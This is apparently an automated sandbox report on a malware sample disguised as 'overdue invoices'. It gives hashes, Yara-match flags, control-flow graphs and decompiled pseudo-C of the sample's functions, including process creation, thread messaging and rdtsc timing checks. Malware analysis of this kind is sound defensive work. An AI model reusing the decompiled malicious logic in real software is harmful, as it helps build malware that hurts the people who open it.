                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 4f153f644145002a3d5e6c2e6e74f0c6f1b7399b431631d45856c17bcb576bd5
                  • Instruction ID: a4072fa7c2a06fd42aa3f3062966daecf006aeb0f24484ee1ed6bb0ce0ac9139
                  • Opcode Fuzzy Hash: 4f153f644145002a3d5e6c2e6e74f0c6f1b7399b431631d45856c17bcb576bd5
                  • Instruction Fuzzy Hash: 919002712021C802D221615A840475A014597D0381F65C421A8814658D86D58C91B161
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: ae5b56c32101b6a1807ce74ba4d1036b65504555d4642151937106ac2af896b9
                  • Instruction ID: 54f554461907a1b40e9c6ea4ef42a979e92d9ae559ddb3623480e5638c7fe3d3
                  • Opcode Fuzzy Hash: ae5b56c32101b6a1807ce74ba4d1036b65504555d4642151937106ac2af896b9
                  • Instruction Fuzzy Hash: 2190027120254402D211615A481471B014597D0382F61C021A5554555D86658C51B5B1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 1cb236c683977411b765c4bbb5d86f8c7745a49528f4d315977312bb2da48bec
                  • Instruction ID: 489867252eb4ee21fd2646d54d157d8a7832fc5165213b39e29a78e55b8a34fd
                  • Opcode Fuzzy Hash: 1cb236c683977411b765c4bbb5d86f8c7745a49528f4d315977312bb2da48bec
                  • Instruction Fuzzy Hash: E8900261602140424251716A88449164145BBE1391761C131A4D88550D85998C65A6A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 8e2a2f96ad9dbf204974afc5a9852d73caa3e0cb07c5a3b15c059ce96a603fed
                  • Instruction ID: 1d1f3b9396c7960c936c81e6448624fb28ee09ee0915e69fc1eafd72231d921f
                  • Opcode Fuzzy Hash: 8e2a2f96ad9dbf204974afc5a9852d73caa3e0cb07c5a3b15c059ce96a603fed
                  • Instruction Fuzzy Hash: C990026121294042D311656A4C14B17014597D0383F61C125A4544554CC9558C61A561
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 7769a3ea56028e6486e053ca8246d153c3804086064b1dd26ab4dc4fdb480dc9
                  • Instruction ID: 5b1a9d08da96403a859ca00bd18e776093ba46e9de11aa41d6c8f9c4969abc1c
                  • Opcode Fuzzy Hash: 7769a3ea56028e6486e053ca8246d153c3804086064b1dd26ab4dc4fdb480dc9
                  • Instruction Fuzzy Hash: E690027120214802D291715A440465A014597D1381FA1C025A4415654DCA558E59B7E1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: ea6bc450975b582a717bc9bfc6265dcb9f5a50ad129d7fdac8c4605127b67233
                  • Instruction ID: 45582046fb79f945afbbc8c96c433cb19f9b5dfadc2d0c99dc4049a6e7893d78
                  • Opcode Fuzzy Hash: ea6bc450975b582a717bc9bfc6265dcb9f5a50ad129d7fdac8c4605127b67233
                  • Instruction Fuzzy Hash: 2690026921314002D291715A540861A014597D1382FA1D425A4405558CC9558C69A361
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 53cd5be38f08f4763cacc72dc117d26068906dbb4cbd5c9129364a294ab5c61a
                  • Instruction ID: 360a39a530cc17e891849e0dfed9d03aa3db1ccb777c2c37dbba7641f40c27db
                  • Opcode Fuzzy Hash: 53cd5be38f08f4763cacc72dc117d26068906dbb4cbd5c9129364a294ab5c61a
                  • Instruction Fuzzy Hash: AF90026130214003D251715A54186164145E7E1381F61D021E4804554CD9558C56A262
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 2c149a4399cfb4aa6807cdb946698615939ac1ab3ca59fd0650d63f470feffcb
                  • Instruction ID: 9581703b5f5982d9255041883ba356ec96cab8698b33e7564656b8d485a5ecd3
                  • Opcode Fuzzy Hash: 2c149a4399cfb4aa6807cdb946698615939ac1ab3ca59fd0650d63f470feffcb
                  • Instruction Fuzzy Hash: 4490027131228402D221615A8404716014597D1381F61C421A4C14558D86D58C91B162
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 3a37d7f4a2bd6e126770f94e87872fbe5b3ff73f4c2452d43913f1094de6450a
                  • Instruction ID: 2c0d1962828aec989f00ba7c0cc82937bda5d666fffb33493e94dde5c44c710d
                  • Opcode Fuzzy Hash: 3a37d7f4a2bd6e126770f94e87872fbe5b3ff73f4c2452d43913f1094de6450a
                  • Instruction Fuzzy Hash: D590027120214402D211659A5408656014597E0381F61D021A9414555EC6A58C91B171
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004088D0 Relevance: .1, Instructions: 92COMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E004088D0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0F0( &_v284, 0x104);
						E0041A760( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                  0x004088db
                  0x004088e3
                  0x004088e5
                  0x004088ea
                  0x004088ef
                  0x00408902
                  0x00408907
                  0x00408910
                  0x0040891c
                  0x0040892f
                  0x00408934
                  0x00408937
                  0x00408940
                  0x00408952
                  0x00408957
                  0x0040895c
                  0x00000000
                  0x00000000
                  0x0040895e
                  0x00408962
                  0x00000000
                  0x00000000
                  0x00408964
                  0x00000000
                  0x00408962
                  0x00408966
                  0x00408969
                  0x0040896f
                  0x00408971
                  0x0040897c
                  0x00408981
                  0x00408984
                  0x00408991
                  0x0040899c
                  0x0040899e
                  0x004089a4
                  0x004089a8
                  0x004089ab
                  0x004089ab
                  0x004089b2
                  0x004089b5
                  0x004089ba
                  0x004089c7
                  0x004088f6
                  0x004088f6
                  0x004088f6

                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                  • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                  • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                  • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004188B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 6 4188b0-4188e1 call 4191e0 RtlAllocateHeap
                  C-Code - Quality: 100%
                  			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                  0x004188c7
                  0x004188d2
                  0x004188dd
                  0x004188e1

                  APIs
                  • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID: 65A
                  • API String ID: 1279760036-2085483392
                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                  • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                  • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00407303 Relevance: 1.7, APIs: 1, Instructions: 188threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 243 407303-40730a 244 4072b2-4072bd 243->244 245 40730c-407368 call 41a140 call 407280 call 4199d0 243->245 247 4072c3-4072ca 244->247 248 4072be call 413e50 244->248 260 407370-4073a2 call 40d3d0 call 418780 245->260 250 4072cc-4072de PostThreadMessageW 247->250 251 4072fe-407302 247->251 248->247 253 4072e0-4072fa call 4092a0 250->253 254 4072fd 250->254 253->254 254->251 265 4073a4-4073ac 260->265 266 4073d7-4073df 260->266 267 4073c6-4073d0 265->267 268 4073ae-4073b5 265->268 267->260 270 4073d2-4073d5 267->270 268->267 269 4073b7-4073be 268->269 269->267 271 4073c0-4073c4 269->271 272 4073fd-40740f call 418710 270->272 271->267 273 4073e0-4073fa call 41a0c0 271->273 272->266 278 407411-40747c call 417f90 272->278 273->272 278->266 281 407482-4074de call 417fd0 278->281 281->266 284 4074e4-407531 call 419670 call 419690 call 41a3b0 call 41a0c0 call 413a50 281->284
                  C-Code - Quality: 63%
                  			E00407303(void* __eax, void* __ebx, signed int* __edx, intOrPtr _a8, long _a12, char* _a16, int _a24) {
				char* _v0;
				char* _v8;
				char* _v132;
				char* _v136;
				char _v656;
				char* _v668;
				char _v676;
				char* _v680;
				char _v688;
				long __edi;
				void* __ebp;
				signed char _t64;
				int _t65;
				void* _t70;
				long _t75;
				int _t79;
				void* _t81;
				signed int _t83;

				_t64 = _t83 ^  *__edx;
				_pop(_t78);
				asm("movsd");
				if(__ebx + 1 != 0) {
					 *((intOrPtr*)(_t64 - 0x2a)) =  *((intOrPtr*)(_t64 - 0x2a)) + _t70;
					asm("les ebp, [edx]");
					_push(0);
					_push(_t64);
					_t65 = E00413E50();
					_t79 = _t65;
					if(_t79 != 0) {
						_t75 = _a12;
						_t65 = PostThreadMessageW(_t75, 0x111, 0, 0); // executed
						_t90 = _t65;
						if(_t65 == 0) {
							_t65 =  *_t79(_t75, 0x8003, _t81 + (E004092A0(_t90, 1, 8) & 0x000000ff) - 0x40, _t65);
						}
					}
					return _t65;
				} else {
					asm("adc esi, [edx]");
					asm("adc [edi+0x55], dh");
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v0 = 0;
					_v680 = 0;
					 &_v676 = E0041A140( &_v676, 0, 0x2a4);
					__esi = _a24;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _a12;
					__eax = E00407280(__ebx, __eflags, _a12,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E004199D0(__ecx);
					_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t15;
					_a24 = 0;
					while(1) {
						__eax = E0040D3D0(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E00418780(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L13:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L17;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L13;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L13;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E0041A0C0(_a12,  &_v688, 0x2a8);
										L17:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E00418710(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *((intOrPtr*)(_a12 + 0x14)) = _v668;
											__edx =  *((intOrPtr*)(__esi + 0x2d0));
											_t35 = __esi + 0x2e8; // 0x2e8
											__eax = _t35;
											 *_t35 = _v136;
											__eax = _a12;
											_t37 = __esi + 0x314; // 0x314
											__ebx = _t37;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E00417F90(__edi, _a12 + 0x220,  *((intOrPtr*)(__esi + 0x2d0)), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t45 = __esi + 0x2e0; // 0x2e0
												__eax = _t45;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a12 = _a12 + 0x224;
												 *((intOrPtr*)(__esi + 0x2e4)) = _v132;
												 *__ebx = 0x18;
												 *((intOrPtr*)(__esi + 0x2d0)) = 0x1a;
												__eax = E00417FD0(__edi, _a12 + 0x224, 0x1a, __ebx, _t45);
												 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eflags =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eax = E00419670(__ecx);
													__ebx = __eax;
													__eax =  *((intOrPtr*)(__ebx + 0x28));
													__eax = E0041A3B0( *((intOrPtr*)(__ebx + 0x28)));
													__edx =  *((intOrPtr*)(__ebx + 0x28));
													_t60 = __eax + 2; // 0x2
													__ecx = __eax + _t60;
													__eax =  &_v656;
													__eax = E00413A50(__edi,  &_v656, 2, 0);
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						goto L21;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L21:
			}





















                  0x00407305
                  0x00407308
                  0x00407309
                  0x0040730a
                  0x004072b2
                  0x004072b7
                  0x004072ba
                  0x004072bc
                  0x004072be
                  0x004072c3
                  0x004072ca
                  0x004072cd
                  0x004072da
                  0x004072dc
                  0x004072de
                  0x004072fb
                  0x004072fb
                  0x004072fd
                  0x00407302
                  0x0040730c
                  0x0040730c
                  0x0040730e
                  0x00407310
                  0x00407311
                  0x00407313
                  0x00407319
                  0x0040731a
                  0x0040731b
                  0x0040731c
                  0x00407324
                  0x00407327
                  0x00407334
                  0x00407339
                  0x0040733c
                  0x00407342
                  0x00407347
                  0x0040734f
                  0x0040735a
                  0x0040735a
                  0x00407361
                  0x00407370
                  0x00407376
                  0x0040737b
                  0x00407388
                  0x00407392
                  0x0040739a
                  0x004073a0
                  0x004073a2
                  0x00000000
                  0x00000000
                  0x004073a4
                  0x004073ac
                  0x004073c6
                  0x004073c6
                  0x004073c9
                  0x004073ca
                  0x004073cd
                  0x004073d0
                  0x00000000
                  0x004073d2
                  0x004073d2
                  0x00000000
                  0x004073d2
                  0x004073ae
                  0x004073ae
                  0x004073b5
                  0x00000000
                  0x004073b7
                  0x004073b7
                  0x004073be
                  0x00000000
                  0x004073c0
                  0x004073c0
                  0x004073c4
                  0x004073e0
                  0x004073e8
                  0x004073f0
                  0x004073f5
                  0x004073fd
                  0x004073fd
                  0x00407405
                  0x0040740d
                  0x0040740f
                  0x00000000
                  0x00407411
                  0x00407411
                  0x00407417
                  0x0040741a
                  0x00407420
                  0x00407423
                  0x00407429
                  0x00407429
                  0x00407430
                  0x00407432
                  0x00407435
                  0x00407435
                  0x0040743c
                  0x0040743f
                  0x00407446
                  0x0040744c
                  0x00407452
                  0x00407458
                  0x0040745e
                  0x00407464
                  0x0040746a
                  0x0040746f
                  0x00407474
                  0x0040747a
                  0x0040747c
                  0x00000000
                  0x00407482
                  0x00407482
                  0x00407485
                  0x00407485
                  0x0040748c
                  0x00407492
                  0x00407498
                  0x0040749e
                  0x004074a4
                  0x004074b0
                  0x004074b8
                  0x004074be
                  0x004074c4
                  0x004074ce
                  0x004074d6
                  0x004074dc
                  0x004074de
                  0x00000000
                  0x004074e4
                  0x004074e4
                  0x004074ea
                  0x004074ea
                  0x004074f0
                  0x004074fd
                  0x004074ff
                  0x00407503
                  0x00407508
                  0x0040750b
                  0x0040750b
                  0x0040751b
                  0x00407523
                  0x0040752b
                  0x0040752c
                  0x0040752d
                  0x0040752e
                  0x00407530
                  0x00407531
                  0x00407531
                  0x004074de
                  0x0040747c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004073c4
                  0x004073be
                  0x004073b5
                  0x00000000
                  0x004073ac
                  0x004073d7
                  0x004073d8
                  0x004073d9
                  0x004073d9
                  0x004073db
                  0x004073dc
                  0x004073de
                  0x004073df
                  0x004073df
                  0x00000000

                  APIs
                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID:
                  • API String ID: 1836367815-0
                  • Opcode ID: 431d794234328f976829e53e6497fbfd339a57d77642b4929c82534cb0631ac4
                  • Instruction ID: 7bb0f37d16603f6604e14c82b28e996f5599e108322aef489ed20dc951a17077
                  • Opcode Fuzzy Hash: 431d794234328f976829e53e6497fbfd339a57d77642b4929c82534cb0631ac4
                  • Instruction Fuzzy Hash: AB61B571904309AFD724DF24DC85BEBB7E8EB09304F10446EF949A7281D774B941CBAA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00407280 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 303 407280-4072ca call 41a140 call 41ad20 call 409b40 call 413e50 312 4072cc-4072de PostThreadMessageW 303->312 313 4072fe-407302 303->313 314 4072e0-4072fa call 4092a0 312->314 315 4072fd 312->315 314->315 315->313
                  C-Code - Quality: 28%
                  			E00407280(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t14;
				intOrPtr* _t15;
				int _t16;
				char* _t20;
				long _t25;
				void* _t28;
				intOrPtr* _t29;
				void* _t30;

				_v68 = 0;
				E0041A140( &_v67, 0, 0x3f);
				_t20 =  &_v68;
				E0041AD20(_t20, 3);
				_t28 = _a4 + 0x1c;
				_t14 = E00409B40(__ebx, _t28, _t28,  &_v68);
				 *((intOrPtr*)(_t14 - 0x2a)) =  *((intOrPtr*)(_t14 - 0x2a)) + _t20;
				asm("les ebp, [edx]");
				_push(0);
				_push(_t14);
				_push(_t28);
				_t15 = E00413E50();
				_t29 = _t15;
				if(_t29 != 0) {
					_t25 = _a8;
					_t16 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					_t37 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t29(_t25, 0x8003, _t30 + (E004092A0(_t37, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
					return _t16;
				}
				return _t15;
			}













                  0x0040728f
                  0x00407293
                  0x00407298
                  0x0040729e
                  0x004072aa
                  0x004072ae
                  0x004072b2
                  0x004072b7
                  0x004072ba
                  0x004072bc
                  0x004072bd
                  0x004072be
                  0x004072c3
                  0x004072ca
                  0x004072cd
                  0x004072da
                  0x004072dc
                  0x004072de
                  0x004072fb
                  0x004072fb
                  0x00000000
                  0x004072fd
                  0x00407302

                  APIs
                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID:
                  • API String ID: 1836367815-0
                  • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                  • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                  • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                  • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00418960 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 333 418960-418979 334 41897f-4189b8 CreateProcessInternalW 333->334 335 41897a call 4191e0 333->335 335->334
                  APIs
                  • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,z@,?,?,?), ref: 004189B4
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateInternalProcess
                  • String ID:
                  • API String ID: 2186235152-0
                  • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                  • Instruction ID: 1af0cfd0e6c2e5daaf689e3a1adcdb327afdc4aaeaa6b63ab644a3d9e900bb8f
                  • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                  • Instruction Fuzzy Hash: 1401AFB2214108BBCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041895D Relevance: 1.5, APIs: 1, Instructions: 36processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 339 41895d-41897a call 4191e0 342 41897f-4189b8 CreateProcessInternalW 339->342
                  APIs
                  • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,z@,?,?,?), ref: 004189B4
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateInternalProcess
                  • String ID:
                  • API String ID: 2186235152-0
                  • Opcode ID: 497e6db9c69d940e3e735cb88db33596d2e8de36eae19100acf969562d4bad13
                  • Instruction ID: d3ca1f82be6b527dfcfe00a5f3954d6ebcc608b13de63b0abccd9b5a3da6f292
                  • Opcode Fuzzy Hash: 497e6db9c69d940e3e735cb88db33596d2e8de36eae19100acf969562d4bad13
                  • Instruction Fuzzy Hash: 62F0F4B6214549AFCB04CF98D880CEB73A9AF8C304B11820CF90D83201D630E851CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

